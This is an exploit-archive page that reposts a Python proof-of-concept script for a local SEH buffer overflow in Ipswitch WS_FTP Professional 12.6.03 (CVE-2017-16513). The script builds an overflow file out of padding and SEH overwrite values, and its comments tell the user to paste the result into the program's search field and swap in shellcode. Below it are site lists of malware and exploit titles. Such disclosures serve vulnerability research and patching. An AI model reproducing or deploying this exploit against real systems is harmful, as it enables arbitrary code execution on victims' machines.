Ipswitch WS_FTP Professional Local Buffer Overflow

Posted on 07 November 2017

#!/usr/bin/python #Title: Ipswitch WS_FTP Professional Local Buffer Overflow (SEH) #Author: Kevin McGuigan. Twitter: @_h3xagram #Author Website: https://www.7elements.co.uk #Vendor Website: https://www.ipswitch.com #Date: 03/11/2017 #Version: 12.6.03 #CVE: CVE-2017-16513 #Tested on: Windows 7 32-bit #Use script to generate payload. Paste payload into search field, replace Ds with shellcode. #nSEH = "x74x08x90x90" #SEH = "x31x2Dx91x23" buffer = "A" * 840 nSEH = "B" * 4 SEH = "C" * 4 f = open ("poc.txt", "w") f.write(buffer + nSEH + SEH + "D" * 200) f.close()

TOP

Malware :

Backdoor.WinCE.Brador.A
WinCE.Dust.A
Backdoor:WinCE/PhoneCreeper.A
Dialer:WinCE/Terdial.A
Trojan:WinCE/Terdial

Last 20

Exploits :

Customer Support System 1.0 Cross Site Scripting
Xhibiter NFT Marketplace 1.10.2 SQL Injection
WordPress WPCode Lite 2.1.14 Cross Site Scripting
Azon Dominator Affiliate Marketing Script SQL Injection
Simple Laboratory Management System 1.0 SQL Injection

Last 20